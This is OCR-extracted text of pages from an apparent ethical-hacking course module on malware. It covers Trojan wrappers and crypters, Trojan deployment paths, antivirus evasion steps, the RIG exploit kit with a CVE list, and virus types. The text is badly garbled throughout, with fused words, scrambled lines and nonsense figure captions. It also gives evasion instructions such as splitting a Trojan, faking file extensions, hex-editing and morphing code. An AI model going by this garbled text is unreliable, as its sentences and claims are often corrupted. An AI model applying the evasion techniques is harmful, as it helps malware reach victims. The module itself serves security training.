nthe oregon
wl installa
Trojana thevee
Texpress
ares
Wizard i nd rape
"
Seton
Wrappers
Acvanced
Fle loner
Soprano
canautomatically
v
‘a
‘that =
3
inate embeded
Employing
a Wrapper
Thelure of free software trickcan users into installing Trojan horses.For instance, a Trojan
horsemight arrive in an emaildescribed as a computer calculator.Whenthe user receives the
emai,the description of the calculatormay lead him/her to installit. Although it may, i n fact,
bea defaultapplication, once the user installs theapplication file,the Trojan is installed i n the
background and it will perform other actions that are not readily apparent to the user, suchas
deleting
filesor emailing
sensitive information
to theattacker.
In another
instance,an attacker
sendsa birthday
greetingthat will install a Trojan
as the user watches,
eg., a birthday
cake
dancing
acrossthe screen.
ical andCountermensores
Mackin ©by E-Comel
Copyright
Fees
CovertWrapper
Programs
=
lExpress Wizard
lxpressWizardis a wrapperprogramthat guides the user to create a self-extracting
package that can automaticallyinstallthe embeddedsetup files,Trojans,etc. lExpress
can remove the setupfilesafterexecution andthuserase traces ofTrojans. Then,it can
run a program or onlyextract hiddenfiles.SuchembeddedTrojans cannot bedetected
byantivirus software,
Welcometo [Express
2.0
Fite 7.26:Screenshot
of xpress Ward
Someadditionalwrapper toolsare as follows:
+
+
elite
Wrap
File
Advanced Joiner
+
3
Soprano
Exe2vbs
Kriptomatik
ical andCountermensores
Mackin ©by E-Comel
Copyright
Employing
a Crypter
is used
not
byto
hide or of
easily file,
©Cryptersoftware byhackers
getdetected ativiuses
keyloggers
viruses, toolsin anykind so thatthey
BitCrypter
"
Crypters
tw encrypt
and
v1.5
Aegicrypter
eee
withoutaffecting
‘pps
sight
Hidden crypter
theirdec functionality Bateship
Cypter
Employing
a Crypter
A crypteris a softwarethat encryptsthe original
binary
codeof the .exe file, Attackersuse
crypters to hideviruses, spyware,keyloggers, etc.,to makethem undetectable
RATS, by
antivirus software.
Somecrypters
that one can use to preventmaliciousprogramsfrom being
detectedbysecurity
are
as
mechanisms follows,
=
BitCrypter
Source:https://www.crypter.com
BitCrypter can be used to encrypt and compress32-bit executablesand .NETapps
without affectingtheir directfunctionality.
A Trojanor malicioussoftware piececan be
encrypted into legitimate softwareto bypass
firewallsandantivirus software.BitCrypter
supportsa widerangeof0S,fromWindowsXPto thelatestWindows10.
ical andCountermensores
Mackin ©by E-Comel
Copyright
Oabeca
Daa. a
[ems
agl [om |
Newleon
Someadditionalcrypter
Figure7.27:
toolsare as follows:
of
Srenshot @tcraer
=
SwayzCryptor
+
=
Hidden
v1.5
AegisCrypter
Sight
Crypter
=
Battleship
Crypter
Heavens
Crypter
Cypherx
Module
7Page
896
tical
Making
and by CountermensoresCopyright©
Comet
Propagating
and Deploying
a Trojan
Deploy
a Trojan
through
E mai Trojan
"Major AttackPaths
Propagating
and Deploying
a Trojan
(Cont'd)
Deploy
a Trojan
through
Covert Channels.
Atackers
use covertchanel to deploy
andhidemalicious nanundetectable
Trojans protocol
vert channels operate
thatare deployed
ons
nthe target
network methodby to
tunneling andare employedattackersevade
mosty
.
f irewalls
NorthKoreantunneling
too!
oe
Sa
B|
Propagating
and Deploying
a Trojan
(Cont'd)
Deploy
a Trojan
through
ProxyServers
_tachers
compromise
over and
Theattackers
str systems
severalcomputers
havefll control
using aTrojan
proxy
theproxyvit’systems
andcan launch
sing thema s hiddenpronyservers
attacks
on other fom
‘tacks
the
us thisto anonymously anddeploy Trojan onto
propagate
ifthe authoritiesdetectlegalactivity,
the targetcomputer
Internet
are servers
Thousands
ofmachines
onthe infected
withpony
>
al]?
Propagating
and Deploying
a Trojan
(Cont'd)
Deploy
a Trojan
through
USB/FlashDrives
|©Atackers
droptheUSB
divesonthepathway
|= Oncethe Use dives pike upand inserted and
wal forrandom
vitims to pickthemup
propagated
infecting
inthe tagesystem
bythelnocent victim the Trojans
thesystem
‘onto execute,thus
angie automatialy andcompromising
the sytem andnetwork
7
Module 898
Page ical andCountermensores
Mackin ©by E-Comel
Copyright
Propagating
and Deploying
a Trojan
(Cont'd)
‘Techniques
for
Evading
Antivirus
Software
the contenoftheTrojan
‘Change sing hexeditora ndalso the
change
checksum thefile
andencrypt
Neveruse downloaded
Trojans r om the
web
fantviuscan detet theseeasy
a Trojan
and Deploying
Propagating
a Trojan
After creating a dropper/downloader,
and employing wrapper, and crypter,
the
attacker the package
must transfer anddeployit on thetarget machine.Theattacker
can use
the following
techniques the Trojan
to propagate package to the targetmachine:
+
Deploy
Deploy
a
aTrojan
through
Trojan
emails
through
covert
channels
*
Deploy through
a Trojan proxyservers
+
DeployTrojan
a USB/flash
through Drives
Deploy a Trojan through Emails
Trojanis the
‘A means bywhichan attackercan gain access to the victim'ssystem. To gain
control
over
the victim's machine,
that luresthe victim into clicking
the malicious
theattacker
on a link provided
link sent bythe attacker,
a
creates Trojan server andthensendsan email
withintheemail.Assoon as the victim clicks
to the Trojan
it connects directly server. The Trojan
server thensends a Trojanto the victim system, whichundergoes automatic installationon the
victim'smachine andinfectsit. Asa result, thevictim'sdevice
establishes a connection withthe
attackserver unknowingly. Oncethe victim connectsto the attacker'sserver, the attackercan
takecomplete
of
controlthe victim’s andperform
system
onlinetransaction or purchase,
anyaction. Ifthevictim carries out an
thenthe attackercan easily stealsensitive informationsuchas
the victim'screditcarddetailsand account information.In addition,
the attackercan use the
Victim'smachineto launchattacks
TheTrojan
on
other
systems,
whenusers open an emailattachmentthat installsthe Trojan
may infectcomputers
on theircomputers,whichmight
for
serve as a backdoor criminalsto accessthesystem later.
ical andCountermensores
Mackin ©by E-Comel
Copyright
MajorTrojan
Atack Pats:
DeployTrojan
a through
Covert Channels
anddeploying
7.28:Propagating
Figure Trojan
through
emall
refersto something
“Overt― obvious,
explicit, whereas
or evident, refersto something
“covert―
concealed,
secret, or hidden.
A legitimate
communicationpath
within a computer
for the transferof data
or network
system
|‘A
that
transfers
channel
computer system
policy
security
informationwithin a
or network i n a waythat violatesthe
Its idlecomponents
to create a covert channel |
can be exploited An example
between
of a covert channel
a Trojan
isthecommunication
andits command-and-control center
between
Table7.2:Comparison the aver channela ndcovert channel
ical andCountermensores
Mackin ©by E-Comel
Copyright
Na
AN
anddeploying
7.29:Propagating
Figure covert channels
Trojanthrough
Deploy
a Trojan
through
Proxy
Servers
A Trojan proxy is usually a standalone application that allowsremote attackersto use the
victim'scomputer as a proxy to connect to the targetmachine. Attackerscompromise several
computers andstart usingthem as hiddenproxyservers. Attackers havefull controlover the
proxy victim’ssystemandcan launchattackson other systems i n the affecteduser'snetwork.
Attackers use thisstrategy to anonymously propagate and deploy the Trojan o n the target
computer. If the authoritiesdetectillegal the footprints
activity, leadto innocent users and not
to the attackers, potentially resultingi n legal hasslesfor the victims,who are ostensibly
responsible for their networkor any attackslaunchedfromthem.Thousands of machines on
the Internet are infectedwith proxy servers. Attackers can alsoemploy proxy server Trojans
suchas Linux.Proxy.10, Proxy Trojan,or Pinkslipbot (Qbot),whichcan automatically create
proxiesandbeusedto perform malicious activities.
, ea. “>
>tally?
ag Sa
gure 730:Propagating
anddeploying
Tojonthrou
Deploy a Trojan
throughUSB/Flash Drives
An attacker
can
also transferthe Trojan
the USBdrive on the targetsystem.
package
onto a USBdriveand
Sometimes, attackersjust drop trick the victim into using
a USBdriveandwait fora
randomvictim to pickit up. Oncethe
bythe innocent victim,the Trojan
method, depending
USB drive is picked
is propagated
on the typeof packaging
up andinsertedinto
on the system
technique
the
target system
bythe dropor download
usedbythe attacker.After propagating
machine,
to the victim’s the Trojan is automatically executedon the targetsystem, thereby
infectingandcompromising the system andnetwork.
=|
a
le
ical andCountermensores
Mackin ©by E-Comel
Copyright
Techniques
forEvading
AntivirusSoftware
Sometimes, various typesof antivirus scannersare deployedi n the targetnetwork, andthese
antivirus scanners do not allow the propagation or deployment of random or malicious
packages.
an and
Hence,propagatingdeploying
attacker.Thevarious techniques
Trojans,
a Trojan stealthily
is one of the important
that can be usedbyattackersto makemalwaresuchas
byantivirus applications
viruses, andworms undetectable are listedbelow.
tasksof.
1. Breakthe Trojan
file into multiple
pieces andzip themas a single
file.
2. Always andembedit into an application
write your Trojan (anantivirus programfailsto
n ew Trojans,
recognize doesnot contain the propersignatures).
as its database
Changethe Trojan’s
syntax:
Converta n EXEto VBscript
©
Change
the .EXEextension to .DOC,
.EXE,
.PPT,
.EXE,
or (Windows
.PDF.EXE hides
“known
extensions―
Change
of
the a up
the content
bydefault;
Trojan
it shows onlyas .DOC,
hence,
usinghexeditor.
.PPT,
.PDF,
etc.)
Changeandthe
file.
the checksum encrypt
(antivirus
downloadedfromthe web
Never use Trojans softwaredetectstheseeasily).
Usebinderandsplitter
toolsthatcan changethe firstfewbytes oftheTrojan programs.
Performcodeobfuscationor morphing.
Morphing is done to preventthe antivirus
programfromdifferentiating
betweenmaliciousandharmlessprograms.
ical andCountermensores
Mackin ©by E-Comel
Copyright
Exploit
Kits CEH
hit
or
‘explo
cimeware
sa
latfrm
deliver
expos
payoads
a5
Trojans,
oot to and Sch soywaes,baddoos,
‘=
aoa 2s EE
Exploit
Kits (Cont'd)
Sage,
Spore,
Revenge,
Matra,
Phiadephia,
Princess
Ransomwa
“©
EX was used
FUG byatacersfordstrbuting
Cryptobt,Cryptoluck,
ryposhils,
RIG _Crymodetense, Cl, nd
NPIOIEISY |
ExploitKits
IG
in
Ek was also
u sed strbutng LatentBot, a ndRar Trojans
Pony
ExploitKits
An exploitkit or crimeware toolkit is usedto exploitsecurity loopholesfoundin software
applicationssuchas AdobeReaderandAdobeFlashPlayer, bydistributing malwaresuchas
spyware,viruses, Trojans,worms, bots, backdoors,bufferoverflowscripts,
or otherpayloadsto
the targetsystem. Exploit exploit
kits come with pre-written code.Thus, theyare easyto use
foran attackerwho is not an IT or securityexpert.Theyalsoprovidea user-friendly
interface
to
track the infectionstatistics as well as a remote mechanism to control the compromised
ical andCountermensores
Mackin ©by E-Comel
Copyright
exploitskits,a n attacker
Using
system. programsthatare accessible
can targetbrowsers, using
browsers,
zero-day
vulnerabilities,
andexploits
updated
with new patches
instantly.
Exploit
kits
are usedagainst
usersrunninginsecure or outdated
software applications
on theirsystems,
goo ==
‘tamasacr
@
aboveshowsthegeneral
Thediagram procedure kit;the processof exploiting
foran exploit a
machinemight
vary depending
on the exploit
kit used
‘=
Thevictim visits a legitimate
websitethat on the compromised
is hosted web server.
‘=
through intermediary
Thevictim is redirected various servers.
‘=
Thevictim unknowingly landson an exploitkit server hosting
the exploit
packlanding
page.
Theexploit kit gathers informationo n the victim, basedon whichit determines
the
exploit
anddeliversit to thevictim'ssystem.
If the exploit
succeeds,
a malwareprogramis downloaded
andexecutedon the victim’s
system.
Exploit
Kits
=
RIGExploit
Kit
TheRIG exploit
kit is one of the most popular
exploit
kitsi nrecent years,with its wide
rangeof malwaredistribution,
RIGEKwas firstdiscovered
in 2014,It is efficientin
distributing
many exploits.
RIGEK was used successfully
byattackersi n distributing
Cryptobit,
CryptoLuck, CryptoShield,CryptoDefense, Sage, Spora, Revenge,PyCL, Matrix,
Philadelphia,
and Princess ransomware. It was alsoinvolvedi n distributingLatentBot,
Pony,andRamnitTrojans. Furthermore, RIGwas involvedin delivering the famous
bankingTrojan Zeus.The latest version of the RIG exploitkit takes advantage of
outdatedversions of applications suchas Flash, Java,Silverlight,
Internet Explorer,
or
MicrosoftEdge to distributethe Cerberr ansomware,
ical andCountermensores
Mackin ©by E-Comel
Copyright
Feature
Landing
pagebased
o n a standard302redirect
Domainto and
auto-rotator
undetectable)
FUD(entirely
avoidblacklistingdetection
exploits
Combinationof differentweb technologies,
suchas DoSWF,
JavaScript,
Flash,and
to obfuscate
‘VBScript, theattack
TheRIGexploitkit is supported as wellas thefollowing
fordifferentbrowsers CVEs:
FlashPlayer
CvE-2018-4878 ‘Adobe Vulnerability
Use-After-Free
VE-2018-8174 Windows
VBScript RemoteCode
Engine
CVE-2013-2551 MicrosoftInternet Explorer
Use-After-Free
Execution
Vulnerability Vulnerability
RemoteCodeExecution
MicrosoftInternetExplorer
CVE-2014-0322 RemoteCodeExecutionVulnerability
Use-After-Free
FlashPlayer
VE-2014-0497 ‘Adobe Vulnerability
RemoteCodeExecution
CvE-2013-0074 MicrosoftSilverlight
DoubleDeferenceRemoteCodeExecutionVulnerability
CVE-2013-2465 Oracle
JavaSEMemory Vulnerability
Corruption
CVE-2012-0507 OracleJavaSERemoteJavaRuntimeEnvironmentCodeExecutionVulnerability
CVE-2014-6332
Windows Vulnerability,
RemoteCodeExecution
OLEAutomationArray
CVE-2015-2419 JScript9
Memory Vulnerability
Corruption
CvE-2016-0189 Scripting
Engine
Memory
Corruption
Vulnerability
Overflow
CVE-2015-8651 Integer FlashPlayer
i n Adobe
Vulnerability
Statistics
Figure7.3%:
Screenshot
ofRIGExpl Kit
ical andCountermensores
Mackin ©by E-Comel
Copyright
Someadditional
exploitkitsthatattackers
c an use to and deploy
propagate Trojans
are as
follows:
=
Magnitude
+
Angler
+
Neutrino
Terror
Sundown
ical andCountermensores
Mackin ©by E-Comel
Copyright
ModuleFlow
‘Malware
ConceptsFiloloss MalwareConcepts
MalwareAnalysis
‘Trojan
Concepts Countermeasures
Virus and
Worm
Concepts Anti-MalwareSoftware
Furthermore, it highlights
differenttypesof viruses, categorizedbytheir origin,techniques
used
to infecttargetsystems,
the typesof filestheyinfect,wheretheyhide,the sort of damage they
cause,the typeof OSthey
work
on, andso on. It alsodealswith computer
betweenworms andviruses, andexplores
difference worm makers.
worms, discusses
the
ical andCountermensores
Mackin ©by E-Comel
Copyright
Introductionto Viruses
(@Asis
program
tat
produces
bya
aselereptiting ts on coy comote boot eto
evs
re traneted
general
fected houghledownloads, d/h dives,ana mal attachments
Creating
Viruses Purpore
of
Introduction to Viruses
Virusesare the scourge of moderncomputing.Computer viruses havethe potential
to wreak
havoco n bothbusiness andpersonal Thelifetimeofa virus depends
computers. on its ability
to
reproduce itself, Therefore,
attackersdesign
every virus codesuchthat the virus replicates
n
itself times.
A computer virus is a self-replicating
programthat produces its code byattaching copiesof
itselfto otherexecutablecodeandoperates withoutthe knowledge or consent of the user. Like
a biological virus, a computer and can contaminate other files;however,
virus is contagious
viruses can infectexternalmachines onlywiththe assistanceof computer users,
+
other
Infects
Transforms
programs
itself
+
Encrypts
Alters
itself
data
ical andCountermensores
Mackin ©by E-Comel
Copyright
=
Corrupts
Replicates
=
itself
files andprograms
Purpose
of
CreatingViruses
Attackerscreate
viruses with disreputablemotives. Criminalscreate viruses to destroya
data,a s an act of vandalism,
company’s or to destroya company’s
products; however,
in some
cases,viruses aidthe system,
createsa virus forthefollowing
An attacker purposes
+
on competitors
inflictdamage
+
+
Realize financialbenefits
Vandalizeintellectualproperty
Play
pranks
Conduct
research
Engage in cyber-terrorism
Distributepolitical
messages
+
+
Damage
Gain
orthe
network computers
remote
access
victim's
computer
to
Indications
of VirusAttack
Indicationsof virus attacksarise fromabnormalactivities. Suchactivities reflectthenature of a
virusbyinterrupting
system
the
regular
the ormerelynot
contributetowardattackingsystem;
runs slowerthan usual,
flow of a process a program.However, all bugs
theymaybe falsepositives. Forexample,
one mayassume that a virus hasinfectedthe system;
created
ifthe
however,
theactualreason might be programoverload.
effectivevirus tendsto multiply
‘An rapidly and mayinfect some machinesi n a short period.
Viruses can infectfiles on the system, andwhen suchfiles are transferred, theycan infect
machines of other userswho receive them.A virus can alsouse file servers to infectfiles.
Whena virus infectsa computer,the victim or user will beableto identify
some indications
of
thepresenceofvirus infection.
=
computer
Someindicationsof
Processes
virus
infection
are
follows: as
=
beeps
with
Computer
no
changes
Drive label
display and OSdoesnot load
antivirus
Constant
alerts
freezes
Computer frequently
or encounters an error suchas BSOD
Files missing
andfoldersare
ical andCountermensores
Mackin ©by E-Comel
Copyright
harddriveactivity
Suspicious
Browserwindow“freezes―
Lackof storagespace
Unwantedadvertisements
andpop-upwindows
ical andCountermensores
Mackin ©by E-Comel
Copyright
of Virus Lifecycle
Stages
osign
virus
| Developing
cade or
sng languagesconstuction
programming
Detection
|Aviusleldentiedas
threat infecting
targetsystems
Incorporation
| sofware
developers
assimilate
Antvrus
defenses
against
vias the
damage
routine
Usersinstall updates
antivirus and liinatethe ius threat
ofVirus Lifecycle
Stages
Thevirus lifecycle
includesthe following fromorigin to elimination.
six stages
1. Design:
2.
Development
Replication:
of for
virus codeusingprogramming
a
languagesor construction kits.
within thetargetsystemandthenspreads
Thevirus replicates period
itself
Launch:Thevirus is activatedwhenthe user performs specific
actions suchas running
an infected
program.
Detection:Thevirus is identifiedas a threat infecting
targetsystem,
Incorporation:Antivirussoftwaredevelopers assimilate defenses the virus.
against
Executionof the damage routine: Usersinstallantivirus updates
andeliminatethe virus
threats
ical andCountermensores
Mackin ©by E-Comel
Copyright
of Viruses
Working
Infection Phase ‘Attack
Phase
(©
nthe
infection
phase,elf
nd are
programmed
with
events
thevirus replicates (8 ruses tigger to
F |
orca pores reget pee? raed
t
=| = i =
ofViruses
Working
Virusescan attacka targethost's systemusing a varietyof methods.Theycan attach
themselvesto programsand transmit themselves to other programs through specific events.
Virusesneedsuchevents to takeplace, as theycannot self-start, infecthardware, or transmit,
themselves usingnon-executable files.“Trigger―
and“direct
attack―
events can cause a virus to
activate and infectthe targetsystem whenthe user triggers attachmentsreceived through
email, websites,maliciousadvertisements, flashcards,pop-ups,and so on. Thevirus can then
attackthe system'sbuilt-inprograms,antivirus software,datafiles,system startupsettings, etc.
Viruseshavetwo phases: theinfection phase andthe attackphase.
+
InfectionPhase
Programs
modifiedbya virus infectioncan enablevirus functionalitiesto run on the
Thevirus infectsthe target
system. systemafter
the execution of infectedprograms,
because it
is triggered and
becomes
the programcodeleadsto the virus code. active upon
Thetwo
©
most
important
of factors
the
infection
phase
Method infection
of
virus
follows: in a are as
©
of
Method spreading
i n the following
virus infectsa system sequence:
©. Thevirus loadsitselfinto memory andchecksfor an executableon thedisk.
0 Thevirus appends
maliciouscodeto a legitimate
programwithout the permission
or
knowledge
of the user.
©. Theuser is unaware of the replacement
andlaunches
the infectedprogram.
ical andCountermensores
Mackin ©by E-Comel
Copyright
Theexecution oftheinfected
programalsoinfects
otherprogramsi n the system,
© The abovecycle
continues until the user realizes
that thereis an anomaly
in the
system.
Apparently,
the user unknowingly and executes the virus
triggers for it to function
Thereare manywaysto execute programs whilethe computer is running.Forexample,
if the user installsany softwaretool, the setupprogramcallsvarious built-in sub:
programsduring extraction. If a virus programalready exists,it can be activatedwith
thistypeof execution, andthe virus can alsoinfectadditionalsetupprograms.
Specificviruses infecti n differentways,suchas
Themost popular
©
methods
a of are
as
follows:
bywhicha virus spreads
Infectedfiles:Avirus can infect varietyfiles,
© File-sharing
unsuspecting of
services: A virus can takeadvantage
usersopentheinfected
file servers to infectfiles.When
files,their machines alsobecomeinfected.
DVDsandother storagemedia:Wheninfected flash
storagemediasuchas DVDs,
drives,
and portable
harddisksare insertedinto a cleansystem,
the system
gets
infected,
Maliciousattachmentsand downloads:A virus spreads
if a maliciousattachment
opened
sent via emailis or whenappsare downloadedfromuntrustedsources.
ical andCountermensores
Mackin ©by E-Comel
Copyright
Before
Infection
After
Infection
-EXEFile File
-EXE
File
Header
iP
{Virus
Jump°°"
Infected
File
AttackPhase
(Once viruses spread throughout the targetsystem, theystart corrupting the filesand
of
programsthe hostsystem.
afterthe triggering
Someviruses can triggerandcorrupt
event is activated.Someviruses havebugs
the hostsystem
that replicate
only
themselves
and perform
activities
their targets
suchas deleting
onlyafterspreading
filesand increasing
session time. Virusescorrupt
as intendedbytheir developers,
perform
Mostviruses that attacktargetsystems the following
actions:
©. slowing
Deletefilesandalterthe content of datafiles, downthe system
> such as playing
Performtasksnot relatedto applications, music and creating
animations
Unfragmented
File Before Attack
File Fragmented
Due to Virus Attack
Page:3Page:1
File:B File:B | Page:3
LyA
File:
Page:2Page:2
A
File:
Figure7.35:
AttackPhase
Thefigure showstwo files,
A andB, Beforethe attack,
the two filesare locatedone after
the otherin an orderly
manner. Oncea virus codeinfectsthe file,i t alterstheposition
of
ical andCountermensores
Mackin ©by E-Comel
Copyright
leading
thefilesplacedconsecutively, i n fileallocations
to inaccuracy andcausingthe
systemto slowdownas the user tries to retrieve the files.
In the attackphase:
© Virusesexecute upon
‘Some
triggering
specific events
via built-in bug
viruses execute andcorrupt after being
programs storedin the
host’s
memory
The latestandmost advancedviruses concealtheirpresence, attacking
onlyafter
thoroughlyspreading
through
the host.
ical andCountermensores
Mackin ©by E-Comel
Copyright
Howdoesa GetInfectedbyViruses?
Computer
UD "Not
rrerrecivenccicemesoone the
running
lates
antvus
appltion
Oneninginected
ataciments
crete
GB mstciou
ema oni ds
patedstare
Installing Using media
portable
No
updating
installing
versions
ad
BD
nt new
cemecinetounuednewos
ical andCountermensores
Mackin ©by E-Comel
Copyright
Whenthe user clicksany suspiciouspop-up by mistake,the virus hidden
Pop-ups:
behindthe pop-up enters the system.
Wheneverthe user turns on the system,
the
virus
installed codewill run i n thebackground.
Removablemedia:Whena healthy
systemis associated
with virus-infectedremovable
media(e.g,,
CO/DVD,USBdrive,
cardreader), virus
Networkaccess: Connecting
a file sharing
to an untrusted
thespreads
the system.
Wi-Fi network, leaving BluetoothON,or
permitting program that is accessed openly will allow a virus to take over
thedevice.
Backup and restore: Taking a backup of an infectedfileandrestoring i t to a system
infectsthe system again with the same virus.
Maliciousonlineads:Attackerspostmaliciousonlineadsbyembedding maliciouscode
in the ads,alsoknownas malvertising. Onceusers clicktheseads,their computers get
infected,
SocialMedia:Peopletendto clickon socialmediasites,including
maliciouslinksshared
bytheir contacts,
whichcan infecttheir systems.
ical andCountermensores
Mackin ©by E-Comel
Copyright
ofViruses
Types
exampleand
(© according
Vieusesare categories to thelrfunctioning targets
(©Some
ofthe includes
or BootSectorViews
‘Sjstem Polymorphic
Vius WebSeptng
vies
Fe andMutipactite
Views Views
Metamorphic EmailandArmoredVieus
Macroand
Guster
Vis
Stealth/Tuneling
Views
FleoF Cavity
‘overwriting
Companion/Cameutlge
Views
Vis ‘Add-on
an intrusive
Virus
DieetActionor TransientVitus
nfctor
Sparse vies FATandLogie
Bomb
Virus
of Viruses
‘Types
Computer
viruses are malicioussoftwareprograms written byattackersto gain unauthorized
accessto a targetsystem. Thus, theycompromisethe security of the systemas well as its
performance. Forany virus to corrupt a system, it hasto firstassociateits codewith executable
code.
to understand
It is important howviruses:
=
Addthemselves to the targethost'scode
=
Chooseto act upon the targetsystem.
Viruses are categories according to their functioning and targets. Some of the most common
typesofcomputer viruses that adversely affectthe security of systems are listedbelow:
System
or BootSector
Virus
File Virus
Multipartite Virus
MacroVirus
Cluster Virus
Encryption Virus
Stealth/Tunneling
Virus
InfectorVirus
Sparse
Polymorphic
Virus
ical andCountermensores
Mackin ©by E-Comel
Copyright
Virus
10,Metamorphic
Cavity
11.Overwriting
Fileor Virus
12.
13.
Companion
Virus/Camouflage
Shell
Virus
Virus
14.FileExtension
Virus
15.FATVirus
16.Logic
Bomb
Virus
17.
18.
Web
Email
Virus
Virus
Scripting
19.
Armored
20.Add-on
Virus
Virus
21.
Intrusive
Virus
or
22, DirectAction Transient Virus
23. TerminateandStay
Resident
Virus(TSR)
‘System
or BootSectorViruses
‘The
most common targetsfor a virus are the system sectors,whichincludethe master boot
record(MBR) andthe 00S boot recordsystem sectors. An OSexecutes code i n theseareas
whilebooting, Every diskhassomesort of system
becauseif the MBR is corrupted,
sector.
MBRs
most
are the virus-pronezones
all datawill be lost.TheDOSboot sector alsoexecutes during
systembooting,
of for
Thisis a crucialpoint attack viruses.
Thesystemsector consistsof only512 bytes of diskspace. Therefore, systemsector viruses
concealtheir code in some other disk space.The primarycarriers of systemor boot sector
viruses are email attachmentsand removablemedia (USB drives). Suchviruses reside in
memory.Some sector viruses also spread through infected files;these are known as
multipartite
viruses.
A boot sector virus moves MBRto anotherlocationon the harddiskand copies itself to the
original locationof MBR. Whenthe systemboots,
first,the virus codeexecutes and then
passes
control
MBR.
to the original
ical andCountermensores
Mackin ©by E-Comel
Copyright
Before Infection
e | |
<——mer———>
After Infection
om = Views
Code—>
|
<—— msr——>
VirusRemoval
736:Working
Figure of systom
and
boot
vius
sector
System
sector viruses create the illusionthatthere is no virus on the system.Oneway to
dealwiththisvirus is to avoidthe use ofthe WindowsOSandswitchto Linuxor Mac,
becauseWindowsis more prone to suchattacks.Linux and Macintoshhavebuilt-in
safeguards againsttheseviruses. Theotherapproach
for protection is to periodically
perform
antivirus checks.
FileViruses
or interpreted
Fileviruses infectfilesexecuted i n the system,
suchas COM,EXE,
SYS,
OVL,OBJ,
PRG,
MNU,
and BATfiles.Fileviruses can be direct-action(non-resident)
or memory-resident
Fileviruses insert theircodeinto the original file and infectexecutable files.Suchviruses are
numerous, albeit rare. They infect i n a varietyof ways and are found i n numerous file types.
Themostcommon typeof file virus operatesbyidentifying the file typeit can infectmost
easily,suchas
executesalong that with filenamesending i n COMor .EXE. During
with programfilesto infectm ore files.Overwriting
programexecution, the virus
a virus is not easy,as the
overwritten programs
Beforeinserting
no longer
function
some
their codeinto a program,
allowthe original
properly. Theseviruses tendto befound immediately.
file viruses save the original
programto execute,so that everything appearsnormal,
instructions and
BK> SRI
Figure7.37:
Working
gaANS
of file
vires
ical andCountermensores
Mackin ©by E-Comel
Copyright
Multipartite
Viruses
A multipartite knownas a multipart
virus (also virus or hybrid
file infectorsandboot recordinfectorsand attemptsto simultaneously the
virus)combines approach
attackboth the boot
sector andthe executableor programfiles.Whenthe virus infectsthe boot sector,
of
it will,i n
turn, affectthesystemfilesandvice versa. Thistypeof virus re-infectsa systemrepeatedly ifit
is not rooted out entirelyfrom the targetmachine.Someexamples of multipartite viruses
include
Invader,
Flip,
Macro Viruses
Tequila,
and
Â¥ mim (N
Infects
Macro Enabled
D ocuments
7.38:Working
Figure ofa macro virus
ClusterViruses
Clusterviruses infectfileswithout changing the file or planting additionalfiles.Theysave the
virus codeto the harddriveandoverwrite thepointeri n the directory entry, directing
thedisk
read pointto the virus codeinsteadof the actualprogram.Eventhough the changes in the
directory
entry mayaffectall the programs,
A clustervirus, e.g., Dir-2,
of
onlyone copy the virus existson the disk
first launchesitself when any programstarts on the computer
system, andcontrolis thenpassed to the actualprogram.
This
virus infectionleadsto severe problems
infectsmemory,it controlsaccessto thedirectory
if the victim doesnot knowits exact location.If it
structure on thedisk
If the victim bootsfrom a cleanfloppy diskandthen runs a utilitysuchas CHKDSK, the utility
reportsa serious problem with the cross-linked file on the disk.Suchutilities usually
offerto
correct the problem. Ifthe offer is accepted, the virus infectsall the executablefilesandresults
of
in the loss original
all
content,or
files to same
size.
mightappear be ofthe
7
Module Page921
© ical andCountermensores
Mackin Copyright
by E-Comel
StealthViruses/Tunneling Viruses
Theseviruses tryto hidefromantivirus programsbyactively altering andcorrupting
the service
callinterruptswhile running.Thevirus code replaces the requests to performoperationswith
respectto these service call interrupts.
Theseviruses state falseinformationto hide their
presencefrom antivirus programs.For example, a stealthvirus hidesthe operationsthat it
modifiedandgivesfalserepresentations. Thus,i t takesover portionsof the targetsystemand
hides
its
viruscode.
placing
byhiding
Astealthvirus hidesfromantivirus software
a copyof itself in some other system
theoriginal
drive,thus replacing
Uninfectedfile that is storedon the harddrive,
of
size the fileor temporarily
the infectedfile with the
Inaddition, performed
a stealthvirus hidesthe modifications byit. It takescontrolof the
system's
functionsthat read files or systemsectors. When another program requests
thathasalready
information modifiedbythe virus, thestealthvirus reportsthatinformation
to
the requesting
program instead,Thisvirus alsoresidesi n memory.
To avoiddetection,
theseviruses always takeover system functionsanduse themto hidetheir
presence
Oneof the carriers of stealthviruses is the rootkit. Installing
a rootkit resultsin sucha virus
attackbecausea Trojan installsthe
rootkit
andcapable
of
is thus hidinganymalware.
AntivirusSoftware
a
Original
TCPIASYS
7.39:Working
Figure ius/tunneling
ofstealth us
=
VirusRemoval
© perform
Always a coldboot (boot
fromwrite-protected
CDor DVD)
© Neveruse DOScommands
suchas FDISK
to fix the virus
(©.
Encryption
Use
antivirus
software
Viruses
Encryption viruses or cryptolocker the targetsystem
viruses penetrate via freeware,
shareware,
codecs, fakeadvertisements, torrents,emailspam, andso on. Thistypeof virus consistsof an
encrypted copyofthevirus anda decryption module. Thedecryption moduleremains constant,
aof
whereasthe encryption makesuse different keys.
encryption
‘An keyconsists of decryption moduleand a n encrypted copyof the code,which
enciphers the virus. Whenthe attackerinjectsthe virus into the targetmachine, the decryptor
will first execute and decrypt the virus body.Then, the virus body executes and replicates
or
ical andCountermensores
Mackin ©by E-Comel
Copyright
becomes residentin the targetmachine,Thereplication processi s successfully
accomplished
usingthe encryptor.Eachvirus-infectedfile uses a different keyfor encryption.
Theseviruses
employ XORon eachbytewith a randomized key, Thedecryption technique employed
is “x,―
or
eachbytewith a randomized
keyis generated
andsavedbythe root virus.
viruses blockaccess
Encryption to target or provide
machines victims with limitedaccess to the
They
system, to hidefrom virus scanners. Thevirus scanner cannot detectthe
use encryption
encryption but it can detectthe decrypting
virus usingsignatures, module,
Encryption
Encryption
key1 Virus 2
Encryption
key2
VirusCode
Encryption
key3 Encryption
Virus3
740: Working
Figure of ener
InfectorViruses,
Sparse
To spread infection,viruses typically
attemptto hidefromantivirus programs.Sparse infector
viruses infectlessoften and tryto minimize their probability
of discovery.
Theseviruses infect
onlyoccasionally uponsatisfyingcertain conditionsor infectonlythosefileswhoselengths fall
withina narrow range.
‘Thesparseinfectorvirus workswith two approaches:
*
Replicates
onlyoccasionally
of the week)
(e.g., every tenth programexecutedor on a particular
day
belowshowtheworking
Thediagram ofa sparseinfector
virus.
attackersendsa sparseinfectorvirus to the targetmachineand setsa wakeup
‘The callfor the
virus to execute on the 15thday
of everymonth.Thisstrategy makesit difficultfor the antivirus
programto detectthe virus, thusallowing the virus to infectthe targetmachinesuccessfully
Wakeup on 15*of
every monthandexecutecode
Figure
